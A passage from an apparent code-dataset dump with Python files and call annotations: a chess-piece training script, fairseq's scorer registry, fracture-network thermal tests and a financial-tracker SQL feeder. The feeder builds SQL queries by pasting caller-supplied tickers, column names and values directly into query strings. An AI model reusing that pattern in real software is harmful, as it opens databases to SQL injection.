'img'}, {}), '(img)', False, 'from tensorflow.keras.preprocessing import image\n'), ((106, 10, 106, 39), 'numpy.expand_dims', 'np.expand_dims', (), '', True, 'import numpy as np\n'), ((109, 13, 109, 42), 'numpy.argmax', 'np.argmax', (), '', True, 'import numpy as np\n'), ((67, 17, 67, 47), 'werkzeug.utils.secure_filename', 'secure_filename', ({(67, 33, 67, 46): 'file.filename'}, {}), '(file.filename)', False, 'from werkzeug.utils import secure_filename\n'), ((72, 12, 72, 35), 'tensorflow.keras.preprocessing.image.img_to_array', 'image.img_to_array', ({(72, 31, 72, 34): 'img'}, {}), '(img)', False, 'from tensorflow.keras.preprocessing import image\n'), ((73, 12, 73, 41), 'numpy.expand_dims', 'np.expand_dims', (), '', True, 'import numpy as np\n'), ((76, 15, 76, 44), 'numpy.argmax', 'np.argmax', (), '', True, 'import numpy as np\n'), ((104, 25, 104, 60), 'os.path.join', 'os.path.join', ({(104, 38, 104, 49): '"""./uploads"""', (104, 51, 104, 59): 'filename'}, {}), "('./uploads', filename)", False, 'import os\n'), ((68, 16, 68, 51), 'os.path.join', 'os.path.join', ({(68, 29, 68, 40): '"""./uploads"""', (68, 42, 68, 50): 'filename'}, {}), "('./uploads', filename)", False, 'import os\n'), ((71, 27, 71, 62), 'os.path.join', 'os.path.join', ({(71, 40, 71, 51): '"""./uploads"""', (71, 53, 71, 61): 'filename'}, {}), "('./uploads', filename)", False, 'import os\n'), ((99, 14, 99, 49), 'os.path.join', 'os.path.join', ({(99, 27, 99, 38): '"""./uploads"""', (99, 40, 99, 48): 'filename'}, {}), "('./uploads', filename)", False, 'import os\n')] |
sandorfoldi/chess_positions_recognition | src/models/train_model.py | b051f5ba066876d54c435d96cf7e339dfc369b3b | import random
import matplotlib.pyplot as plt
import wandb
import hydra
import torch
import torch.utils.data as data_utils
from model import ChessPiecePredictor
from torch import nn, optim
from google.cloud import storage
from torch.utils.data import DataLoader
from torchvision import transforms
from torchvision.datasets import ImageFolder
@hydra.main(config_path="../conf", config_name="config")
def train(cfg):
print(f"Training started with parameters: {cfg}")
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
wandb.init()
torch.manual_seed(cfg.seed)
model = ChessPiecePredictor(
image_size=cfg.image_size,
patch_size=cfg.patch_size,
in_channels=cfg.in_channels,
embed_dim=cfg.embed_dim,
num_heads=cfg.num_heads,
)
wandb.watch(model)
t = transforms.Compose(
[
transforms.Resize((cfg.image_size, cfg.image_size)),
transforms.Grayscale(num_output_channels=cfg.in_channels),
transforms.ToTensor(),
]
)
train_data = ImageFolder(f"{cfg.data_path}/train", transform=t)
validation_data = ImageFolder(f"{cfg.data_path}/test", transform=t)
indices_train = random.sample(range(1, 60000), 5000)
indices_valid = random.sample(range(1, 30000), 1000)
train_data = data_utils.Subset(train_data, indices_train)
validation_data = data_utils.Subset(validation_data, indices_valid)
train_loader = DataLoader(train_data, batch_size=cfg.batch_size, shuffle=True)
validation_loader = DataLoader(validation_data, batch_size=cfg.batch_size, shuffle=True)
criterion = nn.CrossEntropyLoss()
optimizer = optim.Adam(model.parameters(), lr=cfg.lr)
print("Training started...")
train_losses = []
validation_losses = []
batch_count = len(train_loader)
epochs = 2
for e in range(epochs):
train_loss = 0
train_correct = 0
validation_loss = 0
validation_correct = 0
i = 0
for images, labels in train_loader:
# in case we use cuda to train on gpu
images = images.to(device)
labels = labels.to(device)
optimizer.zero_grad()
preds = model(images)
loss = criterion(preds, labels)
loss.backward()
optimizer.step()
train_loss += loss.item()
# accuracy
_, preds_indices = torch.max(preds, dim=1)
train_correct += (preds_indices == labels).sum()
i += 1
if i % 100 == 0:
print(
f"Epoch: {e+1} / {epochs}"
f" - progress: {i} / {batch_count}"
f" - loss: {loss.data.mean()}"
)
for images, labels in validation_loader:
images = images.to(device)
labels = labels.to(device)
preds = model(images)
loss = criterion(preds, labels)
validation_loss += loss.item()
# accuracy
_, preds_indices = torch.max(preds, dim=1)
validation_correct += (preds_indices == labels).sum()
train_accuracy = float(train_correct / (len(train_loader) * cfg.batch_size))
validation_accuracy = float(validation_correct / (len(validation_loader) * cfg.batch_size))
wandb.log({
"train_loss": train_loss,
"validation_loss": validation_loss,
"train_accuracy": train_accuracy,
"validation_accuracy": validation_accuracy,
})
train_losses.append(train_loss / len(train_loader))
validation_losses.append(validation_loss / len(validation_loader))
# plotting
plt.plot(list(range(1, len(train_losses) + 1)), train_losses, label="Training loss")
print("Train losses:", train_losses)
plt.plot(list(range(1, len(validation_losses) + 1)), validation_losses, label="Validation loss")
print("Validation losses:", validation_losses)
plt.xlabel("epoch")
plt.ylabel("loss")
plt.legend()
fig_path = "training_run.png"
plt.savefig(fig_path)
print(f"Saved training loss figure to {fig_path}")
model_path = "trained_model.pth"
torch.save(model.state_dict(), model_path)
print(f"Saved trained model to {model_path}")
storage_client = storage.Client()
bucket = storage_client.bucket("chess_predictor")
blob = bucket.blob("model_blob")
blob.upload_from_filename("outputs/model_0.pt")
if __name__ == "__main__":
train()
| [((16, 1, 16, 56), 'hydra.main', 'hydra.main', (), '', False, 'import hydra\n'), ((22, 4, 22, 16), 'wandb.init', 'wandb.init', ({}, {}), '()', False, 'import wandb\n'), ((24, 4, 24, 31), 'torch.manual_seed', 'torch.manual_seed', ({(24, 22, 24, 30): 'cfg.seed'}, {}), '(cfg.seed)', False, 'import torch\n'), ((26, 12, 32, 5), 'model.ChessPiecePredictor', 'ChessPiecePredictor', (), '', False, 'from model import ChessPiecePredictor\n'), ((33, 4, 33, 22), 'wandb.watch', 'wandb.watch', ({(33, 16, 33, 21): 'model'}, {}), '(model)', False, 'import wandb\n'), ((43, 17, 43, 67), 'torchvision.datasets.ImageFolder', 'ImageFolder', (), '', False, 'from torchvision.datasets import ImageFolder\n'), ((44, 22, 44, 71), 'torchvision.datasets.ImageFolder', 'ImageFolder', (), '', False, 'from torchvision.datasets import ImageFolder\n'), ((50, 17, 50, 61), 'torch.utils.data.Subset', 'data_utils.Subset', ({(50, 35, 50, 45): 'train_data', (50, 47, 50, 60): 'indices_train'}, {}), '(train_data, indices_train)', True, 'import torch.utils.data as data_utils\n'), ((51, 22, 51, 71), 'torch.utils.data.Subset', 'data_utils.Subset', ({(51, 40, 51, 55): 'validation_data', (51, 57, 51, 70): 'indices_valid'}, {}), '(validation_data, indices_valid)', True, 'import torch.utils.data as data_utils\n'), ((53, 19, 53, 82), 'torch.utils.data.DataLoader', 'DataLoader', (), '', False, 'from torch.utils.data import DataLoader\n'), ((54, 24, 54, 92), 'torch.utils.data.DataLoader', 'DataLoader', (), '', False, 'from torch.utils.data import DataLoader\n'), ((56, 16, 56, 37), 'torch.nn.CrossEntropyLoss', 'nn.CrossEntropyLoss', ({}, {}), '()', False, 'from torch import nn, optim\n'), ((131, 4, 131, 23), 'matplotlib.pyplot.xlabel', 'plt.xlabel', ({(131, 15, 131, 22): '"""epoch"""'}, {}), "('epoch')", True, 'import matplotlib.pyplot as plt\n'), ((132, 4, 132, 22), 'matplotlib.pyplot.ylabel', 'plt.ylabel', ({(132, 15, 132, 21): '"""loss"""'}, {}), "('loss')", True, 'import matplotlib.pyplot as plt\n'), ((133, 4, 133, 16), 'matplotlib.pyplot.legend', 'plt.legend', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((136, 4, 136, 25), 'matplotlib.pyplot.savefig', 'plt.savefig', ({(136, 16, 136, 24): 'fig_path'}, {}), '(fig_path)', True, 'import matplotlib.pyplot as plt\n'), ((143, 21, 143, 37), 'google.cloud.storage.Client', 'storage.Client', ({}, {}), '()', False, 'from google.cloud import storage\n'), ((114, 8, 119, 10), 'wandb.log', 'wandb.log', ({(114, 18, 119, 9): "{'train_loss': train_loss, 'validation_loss': validation_loss,\n 'train_accuracy': train_accuracy, 'validation_accuracy':\n validation_accuracy}"}, {}), "({'train_loss': train_loss, 'validation_loss': validation_loss,\n 'train_accuracy': train_accuracy, 'validation_accuracy':\n validation_accuracy})", False, 'import wandb\n'), ((20, 36, 20, 61), 'torch.cuda.is_available', 'torch.cuda.is_available', ({}, {}), '()', False, 'import torch\n'), ((37, 12, 37, 63), 'torchvision.transforms.Resize', 'transforms.Resize', ({(37, 30, 37, 62): '(cfg.image_size, cfg.image_size)'}, {}), '((cfg.image_size, cfg.image_size))', False, 'from torchvision import transforms\n'), ((38, 12, 38, 69), 'torchvision.transforms.Grayscale', 'transforms.Grayscale', (), '', False, 'from torchvision import transforms\n'), ((39, 12, 39, 33), 'torchvision.transforms.ToTensor', 'transforms.ToTensor', ({}, {}), '()', False, 'from torchvision import transforms\n'), ((87, 31, 87, 54), 'torch.max', 'torch.max', (), '', False, 'import torch\n'), ((108, 31, 108, 54), 'torch.max', 'torch.max', (), '', False, 'import torch\n')] |
fairseq-FT/fairseq | fairseq/scoring/__init__.py | 18725499144c1bba7c151b796ba774e59d36eaa9 | # Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import importlib
import os
from abc import ABC, abstractmethod
from fairseq import registry
from omegaconf import DictConfig
class BaseScorer(ABC):
def __init__(self, cfg):
self.cfg = cfg
self.ref = []
self.pred = []
def add_string(self, ref, pred):
self.ref.append(ref)
self.pred.append(pred)
@abstractmethod
def score(self) -> float:
pass
@abstractmethod
def result_string(self) -> str:
pass
_build_scorer, register_scorer, SCORER_REGISTRY, _ = registry.setup_registry(
"--scoring", default="bleu"
)
def build_scorer(choice, tgt_dict):
if isinstance(choice, DictConfig):
choice = choice._name
if choice == "bleu":
from fairseq.scoring import bleu
return bleu.Scorer(
bleu.BleuConfig(pad=tgt_dict.pad(), eos=tgt_dict.eos(), unk=tgt_dict.unk())
)
return _build_scorer(choice)
# automatically import any Python files in the current directory
for file in os.listdir(os.path.dirname(__file__)):
if file.endswith(".py") and not file.startswith("_"):
module = file[: file.find(".py")]
importlib.import_module("fairseq.scoring." + module)
| [((34, 53, 36, 1), 'fairseq.registry.setup_registry', 'registry.setup_registry', (), '', False, 'from fairseq import registry\n'), ((53, 23, 53, 48), 'os.path.dirname', 'os.path.dirname', ({(53, 39, 53, 47): '__file__'}, {}), '(__file__)', False, 'import os\n'), ((56, 8, 56, 60), 'importlib.import_module', 'importlib.import_module', ({(56, 32, 56, 59): "('fairseq.scoring.' + module)"}, {}), "('fairseq.scoring.' + module)", False, 'import importlib\n')] |
richardhaslam/discrete-fracture-network | dfn/tests/test_FractureNetworkThermal.py | 2a235fdd3aedfb80dbd9f441d07c5713a6d6c74f | import copy
import unittest
import networkx as nx
import numpy as np
from scipy.special import erf
from dfn import Fluid, FractureNetworkThermal
class TestFractureNetworkThermal(unittest.TestCase):
def __init__(self, *args, **kwargs):
super(TestFractureNetworkThermal, self).__init__(*args, **kwargs)
# fluid properties
cp_w = 4300.0
rho_w = 1000.0
mu_w = 1E-3
self.fluid = Fluid(density=rho_w, viscosity=mu_w, heat_capacity=cp_w)
# reservoir properties
k_r = 2.9
cp_r = 1050.0
rho_r = 2700.0
alpha_r = k_r / (rho_r * cp_r)
# first network
conn_1 = [(0, 1), (1, 2), (1, 3), (2, 4), (3, 4), (4, 5)]
L_1 = [100, 500, 500, 500, 500, 100]
H_1 = [500, 500, 500, 500, 500, 500]
w_1 = [1E-3, 1E-3, 1E-3, 1E-3, 1E-3, 1E-3]
self.network_1 = FractureNetworkThermal(conn_1, L_1, H_1, w_1, k_r,
alpha_r)
# second network
conn_2 = [(0, 1), (1, 2), (2, 3), (1, 4), (2, 5), (3, 6), (4, 5),
(5, 6), (4, 7), (5, 8), (6, 9), (7, 8), (8, 9), (9, 10)]
L_2 = 250 * np.ones(len(conn_2))
L_2[0] = 100
L_2[-1] = 100
H_2 = 500 * np.ones(len(conn_2))
w_2 = 1E-3 * np.ones(len(conn_2))
self.network_2 = FractureNetworkThermal(conn_2, L_2, H_2, w_2, k_r,
alpha_r)
def copy_networks(self):
"""Return a copy of the fracture networks."""
return copy.copy(self.network_1), copy.copy(self.network_2)
def networks_with_flow(self):
"""Return networks with the mass flow calculated."""
network_1, network_2 = self.copy_networks()
P_0 = 0.0
m_inj = 50.0
network_1.calculate_flow(self.fluid, {0: P_0}, {5: -m_inj})
network_2.calculate_flow(self.fluid, {0: P_0}, {10: -m_inj})
return network_1, network_2
def reverse_nodes(self, network, segments):
"""Reverse the node order for given segments."""
conn = network.connectivity
for seg in segments:
inlet, outlet = conn[seg]
conn[seg, :] = outlet, inlet
network.connectivity = conn
return network
def test_no_mass_flow(self):
"""Test if TypeError is raised for networks without flow calculated."""
with self.assertRaises(TypeError):
self.network_1._check_if_calculated()
with self.assertRaises(TypeError):
self.network_2._check_if_calculated()
def test_neg_mass_flow(self):
"""Test if valueError is raised for networks with negative flow."""
network_1, network_2 = self.networks_with_flow()
network_1 = self.reverse_nodes(network_1, [1])
network_2 = self.reverse_nodes(network_2, [1])
network_1.calculate_flow(self.fluid, {0: 0}, {5: -1.0})
network_2.calculate_flow(self.fluid, {0: 0}, {10: -1.0})
with self.assertRaises(ValueError):
network_1.calculate_temperature(self.fluid, 0, [0], [1])
with self.assertRaises(ValueError):
network_2.calculate_temperature(self.fluid, 0, [0], [1])
def test_construct_graph(self):
"""Test _construct_graph method."""
network_1, network_2 = self.networks_with_flow()
network_1._construct_graph()
network_2._construct_graph()
# construct graph for network 1
G_1 = nx.MultiDiGraph()
edge_data_1 = [(0, 1, {'index': 0}), (1, 2, {'index': 1}),
(1, 3, {'index': 2}), (2, 4, {'index': 3}),
(3, 4, {'index': 4}), (4, 5, {'index': 5})]
G_1.add_edges_from(edge_data_1)
# construct graph for network 2
G_2 = nx.MultiDiGraph()
edge_data_2 = [(0, 1, {'index': 0}), (1, 2, {'index': 1}),
(2, 3, {'index': 2}), (1, 4, {'index': 3}),
(2, 5, {'index': 4}), (3, 6, {'index': 5}),
(4, 5, {'index': 6}), (5, 6, {'index': 7}),
(4, 7, {'index': 8}), (5, 8, {'index': 9}),
(6, 9, {'index': 10}), (7, 8, {'index': 11}),
(8, 9, {'index': 12}), (9, 10, {'index': 13})]
G_2.add_edges_from(edge_data_2)
# return True if graphs are the same
is_isomorphic_1 = nx.is_isomorphic(network_1.graph, G_1)
is_isomorphic_2 = nx.is_isomorphic(network_2.graph, G_2)
self.assertTrue(is_isomorphic_1)
self.assertTrue(is_isomorphic_2)
def test_find_injection_nodes(self):
"""Test _find_injection_nodes method."""
network_1, network_2 = self.networks_with_flow()
network_1._construct_graph()
network_2._construct_graph()
self.assertEqual(network_1._find_injection_nodes(), [0])
self.assertEqual(network_2._find_injection_nodes(), [0])
def test_mass_contribution(self):
"""Test _mass_contribution method."""
network_1, network_2 = self.networks_with_flow()
chi_1 = network_1._mass_contribution()
chi_2 = network_2._mass_contribution()
# first network
for i in (0, 1, 2, 5):
self.assertAlmostEqual(chi_1[i], 1.0, 12)
self.assertAlmostEqual(chi_1[3] + chi_1[4], 1.0, 12)
# second network
for i in (0, 1, 2, 3, 8, 13):
self.assertAlmostEqual(chi_2[i], 1.0, 12)
for i, j in [(4, 6), (5, 7), (9, 11), (10, 12)]:
self.assertAlmostEqual(chi_2[i] + chi_2[j], 1.0, 12)
def test_find_paths(self):
"""Test find_paths method."""
# .find_paths method calls .construct_graph if needed. Manually call
# .construct_graph() on one network for testing both True and False
# conditions
network_1, network_2 = self.networks_with_flow()
network_1._construct_graph()
path_1 = {(0, 1, 3), (0, 2, 4)}
path_2 = {(0, 1, 2, 5, 10), (0, 1, 4, 7, 10), (0, 3, 6, 7, 10),
(0, 3, 6, 9, 12), (0, 3, 8, 11, 12), (0, 1, 4, 9, 12)}
self.assertEqual(path_1, set(network_1.find_paths(0, 4)))
self.assertEqual(path_2, set(network_2.find_paths(0, 9)))
def test_calculate_temperature_inlet_segment(self):
"""Test calculate_temperature ability to handle the inlet segment."""
# operational parameters for temperature
t_end = 86400 * 365.25 * 20
time = t_end * np.linspace(1.0 / 100, 1.0, 100)
distance = np.linspace(0.0, 100.0, 100)
z, t = np.meshgrid(distance, time)
network_1, network_2 = self.networks_with_flow()
# create parameters for temperature manually
m_1 = network_1.mass_flow[0]
m_2 = network_2.mass_flow[0]
beta_1 = 2 * network_1.thermal_cond * network_1.thickness[0] / \
(m_1 * network_1.fluid.c_f)
beta_2 = 2 * network_2.thermal_cond * network_2.thickness[0] / \
(m_2 * network_2.fluid.c_f)
xi_1 = beta_1 * z / (2 * np.sqrt(network_1.thermal_diff * t))
xi_2 = beta_2 * z / (2 * np.sqrt(network_2.thermal_diff * t))
Theta_1 = erf(xi_1)
Theta_2 = erf(xi_2)
# difference between manual and automatic construction
diff_1 = Theta_1 - network_1.calculate_temperature(self.fluid, 0,
distance, time)
diff_2 = Theta_2 - network_2.calculate_temperature(self.fluid, 0,
distance, time)
self.assertAlmostEqual((diff_1**2).sum() / (Theta_1**2).sum(), 0, 12)
self.assertAlmostEqual((diff_2**2).sum() / (Theta_2**2).sum(), 0, 12)
def test_calculate_temperature(self):
"""Test calculate_temperature by constructing manual the equations."""
# operational parameters for temperature
t_end = 86400 * 365.25 * 20
time = t_end * np.linspace(1.0 / 100, 1.0, 100)
distance = np.linspace(0.0, 100.0, 100)
z, t = np.meshgrid(distance, time)
network_1, network_2 = self.networks_with_flow()
# create parameters for temperature manually
chi_1 = np.array([1.0, 1.0, 1.0, 0.5, 0.5, 1.0])
chi_2 = np.ones(network_2.n_segments)
chi_2[4:8] = 0.5
chi_2[9:13] = 0.5
m_1 = network_1.mass_flow
m_2 = network_2.mass_flow
beta_1 = 2 * network_1.thermal_cond * network_1.thickness / \
(m_1 * network_1.fluid.c_f)
beta_2 = 2 * network_2.thermal_cond * network_2.thickness / \
(m_2 * network_2.fluid.c_f)
xi_1 = np.einsum('i,jk->ijk', beta_1 * network_1.length,
1 / (2 * np.sqrt(network_1.thermal_diff * t)))
xi_2 = np.einsum('i,jk->ijk', beta_2 * network_2.length,
1 / (2 * np.sqrt(network_2.thermal_diff * t)))
a = xi_1[[0, 2, 4], :, :].sum(axis=0)
b = xi_1[[0, 1, 3], :, :].sum(axis=0)
xi_seg = beta_1[-1] * z / (2 * np.sqrt(network_1.thermal_diff * t))
Theta_1 = chi_1[0] * chi_1[2] * chi_1[4] * erf(a + xi_seg) + \
chi_1[0] * chi_1[1] * chi_1[3] * erf(b + xi_seg)
a = xi_2[[0, 1, 2, 5, 10], :, :].sum(axis=0)
b = xi_2[[0, 1, 4, 7, 10], :, :].sum(axis=0)
c = xi_2[[0, 3, 6, 7, 10], :, :].sum(axis=0)
d = xi_2[[0, 3, 6, 9, 12], :, :].sum(axis=0)
e = xi_2[[0, 3, 8, 11, 12], :, :].sum(axis=0)
f = xi_2[[0, 1, 4, 9, 12], :, :].sum(axis=0)
C_1 = chi_2[0] * chi_2[1] * chi_2[2] * chi_2[5] * chi_2[10]
C_2 = chi_2[0] * chi_2[1] * chi_2[4] * chi_2[7] * chi_2[10]
C_3 = chi_2[0] * chi_2[3] * chi_2[6] * chi_2[7] * chi_2[10]
C_4 = chi_2[0] * chi_2[3] * chi_2[6] * chi_2[9] * chi_2[12]
C_5 = chi_2[0] * chi_2[3] * chi_2[8] * chi_2[11] * chi_2[12]
C_6 = chi_2[0] * chi_2[1] * chi_2[4] * chi_2[9] * chi_2[12]
xi_seg = beta_2[-1] * z / (2 * np.sqrt(network_2.thermal_diff * t))
Theta_2 = C_1 * erf(a + xi_seg) + C_2 * erf(b + xi_seg) + \
C_3 * erf(c + xi_seg) + C_4 * erf(d + xi_seg) + \
C_5 * erf(e + xi_seg) + C_6 * erf(f + xi_seg)
# difference between manual and automatic construction
diff_1 = Theta_1 - network_1.calculate_temperature(self.fluid, 5,
distance, time)
diff_2 = Theta_2 - network_2.calculate_temperature(self.fluid, 13,
distance, time)
self.assertAlmostEqual((diff_1**2).sum() / (Theta_1**2).sum(), 0, 12)
self.assertAlmostEqual((diff_2**2).sum() / (Theta_2**2).sum(), 0, 12)
if __name__ == '__main__':
unittest.main()
| [((282, 4, 282, 19), 'unittest.main', 'unittest.main', ({}, {}), '()', False, 'import unittest\n'), ((20, 21, 20, 77), 'dfn.Fluid', 'Fluid', (), '', False, 'from dfn import Fluid, FractureNetworkThermal\n'), ((33, 25, 34, 56), 'dfn.FractureNetworkThermal', 'FractureNetworkThermal', ({(33, 48, 33, 54): 'conn_1', (33, 56, 33, 59): 'L_1', (33, 61, 33, 64): 'H_1', (33, 66, 33, 69): 'w_1', (33, 71, 33, 74): 'k_r', (34, 48, 34, 55): 'alpha_r'}, {}), '(conn_1, L_1, H_1, w_1, k_r, alpha_r)', False, 'from dfn import Fluid, FractureNetworkThermal\n'), ((44, 25, 45, 56), 'dfn.FractureNetworkThermal', 'FractureNetworkThermal', ({(44, 48, 44, 54): 'conn_2', (44, 56, 44, 59): 'L_2', (44, 61, 44, 64): 'H_2', (44, 66, 44, 69): 'w_2', (44, 71, 44, 74): 'k_r', (45, 48, 45, 55): 'alpha_r'}, {}), '(conn_2, L_2, H_2, w_2, k_r, alpha_r)', False, 'from dfn import Fluid, FractureNetworkThermal\n'), ((111, 14, 111, 31), 'networkx.MultiDiGraph', 'nx.MultiDiGraph', ({}, {}), '()', True, 'import networkx as nx\n'), ((118, 14, 118, 31), 'networkx.MultiDiGraph', 'nx.MultiDiGraph', ({}, {}), '()', True, 'import networkx as nx\n'), ((129, 26, 129, 64), 'networkx.is_isomorphic', 'nx.is_isomorphic', ({(129, 43, 129, 58): 'network_1.graph', (129, 60, 129, 63): 'G_1'}, {}), '(network_1.graph, G_1)', True, 'import networkx as nx\n'), ((130, 26, 130, 64), 'networkx.is_isomorphic', 'nx.is_isomorphic', ({(130, 43, 130, 58): 'network_2.graph', (130, 60, 130, 63): 'G_2'}, {}), '(network_2.graph, G_2)', True, 'import networkx as nx\n'), ((189, 19, 189, 47), 'numpy.linspace', 'np.linspace', ({(189, 31, 189, 34): '0.0', (189, 36, 189, 41): '100.0', (189, 43, 189, 46): '100'}, {}), '(0.0, 100.0, 100)', True, 'import numpy as np\n'), ((190, 15, 190, 42), 'numpy.meshgrid', 'np.meshgrid', ({(190, 27, 190, 35): 'distance', (190, 37, 190, 41): 'time'}, {}), '(distance, time)', True, 'import numpy as np\n'), ((205, 18, 205, 27), 'scipy.special.erf', 'erf', ({(205, 22, 205, 26): 'xi_1'}, {}), '(xi_1)', False, 'from scipy.special import erf\n'), ((206, 18, 206, 27), 'scipy.special.erf', 'erf', ({(206, 22, 206, 26): 'xi_2'}, {}), '(xi_2)', False, 'from scipy.special import erf\n'), ((224, 19, 224, 47), 'numpy.linspace', 'np.linspace', ({(224, 31, 224, 34): '0.0', (224, 36, 224, 41): '100.0', (224, 43, 224, 46): '100'}, {}), '(0.0, 100.0, 100)', True, 'import numpy as np\n'), ((225, 15, 225, 42), 'numpy.meshgrid', 'np.meshgrid', ({(225, 27, 225, 35): 'distance', (225, 37, 225, 41): 'time'}, {}), '(distance, time)', True, 'import numpy as np\n'), ((230, 16, 230, 56), 'numpy.array', 'np.array', ({(230, 25, 230, 55): '[1.0, 1.0, 1.0, 0.5, 0.5, 1.0]'}, {}), '([1.0, 1.0, 1.0, 0.5, 0.5, 1.0])', True, 'import numpy as np\n'), ((231, 16, 231, 45), 'numpy.ones', 'np.ones', ({(231, 24, 231, 44): 'network_2.n_segments'}, {}), '(network_2.n_segments)', True, 'import numpy as np\n'), ((49, 15, 49, 40), 'copy.copy', 'copy.copy', ({(49, 25, 49, 39): 'self.network_1'}, {}), '(self.network_1)', False, 'import copy\n'), ((49, 42, 49, 67), 'copy.copy', 'copy.copy', ({(49, 52, 49, 66): 'self.network_2'}, {}), '(self.network_2)', False, 'import copy\n'), ((187, 23, 187, 55), 'numpy.linspace', 'np.linspace', ({(187, 35, 187, 44): '(1.0 / 100)', (187, 46, 187, 49): '(1.0)', (187, 51, 187, 54): '(100)'}, {}), '(1.0 / 100, 1.0, 100)', True, 'import numpy as np\n'), ((222, 23, 222, 55), 'numpy.linspace', 'np.linspace', ({(222, 35, 222, 44): '(1.0 / 100)', (222, 46, 222, 49): '(1.0)', (222, 51, 222, 54): '(100)'}, {}), '(1.0 / 100, 1.0, 100)', True, 'import numpy as np\n'), ((202, 33, 202, 68), 'numpy.sqrt', 'np.sqrt', ({(202, 41, 202, 67): '(network_1.thermal_diff * t)'}, {}), '(network_1.thermal_diff * t)', True, 'import numpy as np\n'), ((203, 33, 203, 68), 'numpy.sqrt', 'np.sqrt', ({(203, 41, 203, 67): '(network_2.thermal_diff * t)'}, {}), '(network_2.thermal_diff * t)', True, 'import numpy as np\n'), ((248, 39, 248, 74), 'numpy.sqrt', 'np.sqrt', ({(248, 47, 248, 73): '(network_1.thermal_diff * t)'}, {}), '(network_1.thermal_diff * t)', True, 'import numpy as np\n'), ((250, 51, 250, 66), 'scipy.special.erf', 'erf', ({(250, 55, 250, 65): '(a + xi_seg)'}, {}), '(a + xi_seg)', False, 'from scipy.special import erf\n'), ((251, 45, 251, 60), 'scipy.special.erf', 'erf', ({(251, 49, 251, 59): '(b + xi_seg)'}, {}), '(b + xi_seg)', False, 'from scipy.special import erf\n'), ((266, 39, 266, 74), 'numpy.sqrt', 'np.sqrt', ({(266, 47, 266, 73): '(network_2.thermal_diff * t)'}, {}), '(network_2.thermal_diff * t)', True, 'import numpy as np\n'), ((270, 42, 270, 57), 'scipy.special.erf', 'erf', ({(270, 46, 270, 56): '(f + xi_seg)'}, {}), '(f + xi_seg)', False, 'from scipy.special import erf\n'), ((243, 34, 243, 69), 'numpy.sqrt', 'np.sqrt', ({(243, 42, 243, 68): 'network_1.thermal_diff * t'}, {}), '(network_1.thermal_diff * t)', True, 'import numpy as np\n'), ((245, 34, 245, 69), 'numpy.sqrt', 'np.sqrt', ({(245, 42, 245, 68): 'network_2.thermal_diff * t'}, {}), '(network_2.thermal_diff * t)', True, 'import numpy as np\n'), ((270, 18, 270, 33), 'scipy.special.erf', 'erf', ({(270, 22, 270, 32): '(e + xi_seg)'}, {}), '(e + xi_seg)', False, 'from scipy.special import erf\n'), ((269, 42, 269, 57), 'scipy.special.erf', 'erf', ({(269, 46, 269, 56): '(d + xi_seg)'}, {}), '(d + xi_seg)', False, 'from scipy.special import erf\n'), ((269, 18, 269, 33), 'scipy.special.erf', 'erf', ({(269, 22, 269, 32): '(c + xi_seg)'}, {}), '(c + xi_seg)', False, 'from scipy.special import erf\n'), ((268, 25, 268, 40), 'scipy.special.erf', 'erf', ({(268, 29, 268, 39): '(a + xi_seg)'}, {}), '(a + xi_seg)', False, 'from scipy.special import erf\n'), ((268, 49, 268, 64), 'scipy.special.erf', 'erf', ({(268, 53, 268, 63): '(b + xi_seg)'}, {}), '(b + xi_seg)', False, 'from scipy.special import erf\n')] |
gusamarante/Quantequim | dataapi/AWS/getawsdata.py | 3968d9965e8e2c3b5850f1852b56c485859a9c89 | """
Author: Gustavo Amarante
"""
import numpy as np
import pandas as pd
from datetime import datetime
class TrackerFeeder(object):
"""
Feeder for the trackers of the FinanceHub database.
"""
def __init__(self, db_connect):
"""
Feeder construction
:param db_connect: sql connection engine from sqlalchemy
"""
self.conn = db_connect.connection
def fetch(self, fh_ticker):
"""
grabs trackers from the FH database
:param fh_ticker: str or list with the tickers from the database trackers
:return: pandas DataFrame with tickers on the columns
"""
assert type(fh_ticker) is str or type(fh_ticker) is list or type(fh_ticker) is dict, \
"'tickers' must be a string, list or dict"
sql_query = 'SELECT time_stamp, fh_ticker, value FROM "trackers" WHERE '
if type(fh_ticker) is str:
sql_query = sql_query + "fh_ticker IN ('" + fh_ticker + "')"
elif type(fh_ticker) is list:
sql_query = sql_query + "fh_ticker IN ('" + "', '".join(fh_ticker) + "')"
elif type(fh_ticker) is dict:
sql_query = sql_query + "fh_ticker IN ('" + "', '".join(list(fh_ticker.keys())) + "')"
df = pd.read_sql(sql=sql_query, con=self.conn)
df = df.pivot(index='time_stamp', columns='fh_ticker', values='value')
if type(fh_ticker) is dict:
df = df.rename(fh_ticker, axis=1)
df.index = pd.to_datetime(df.index)
df = df.dropna(how='all')
df = df.sort_index()
return df
def fetch_metadata(self):
"""
Returns the full metadata table of the FH trackers, which is useful to do custom filters and look at what
is in the database.
:return: pandas Dataframe
"""
sql_query = 'SELECT * FROM "trackers_description"'
df = pd.read_sql(sql=sql_query, con=self.conn)
return df
def filter_fetch(self, filter_dict, ret='series'):
"""
Grabs the trackers from the FH database that satisfy the criteria given by 'filter_dict'.
:param filter_dict: dict. Keys must be column names from the metadata table. Values must be
either str or list of str
:param ret: If 'series', returns the a dataframe with the tracker series that staistfy the conditions.
If 'tickers', returns a list of the tickers that staistfy the conditions.
:return: list or pandas DataFrame
"""
assert type(filter_dict) is dict, "'filter_dict' must be a dict"
assert len(filter_dict) > 0, "'filter_dict' is empty"
assert ret.lower() in ['series', 'tickers'], "'ret' must be either 'series' or 'ticker'"
desc_query = 'SELECT fh_ticker FROM trackers_description WHERE '
for col in filter_dict.keys():
if type(filter_dict[col]) is list:
desc_query = desc_query + col + " IN ('" + "', '".join(filter_dict[col]) + "')"
else:
desc_query = desc_query + col + f" IN ('{filter_dict[col]}')"
desc_query = desc_query + ' and '
desc_query = desc_query[:-5]
df = pd.read_sql(sql=desc_query, con=self.conn)
tickers = df.values.flatten().tolist()
if ret == 'tickers':
return tickers
df = self.fetch(tickers)
return df
def filter_parameters(self):
"""
Grabs the possible columns and their respective unique values from the metadata table.
:return: dict. Keys are the column names, values are list of unique values of the column.
"""
df = self.fetch_metadata()
param_dict = {}
for col in df.columns:
param_dict[col] = df[col].unique().tolist()
return param_dict
def fetch_everything(self):
sql_query = 'SELECT time_stamp, fh_ticker, value FROM "trackers"'
df = pd.read_sql(sql=sql_query, con=self.conn)
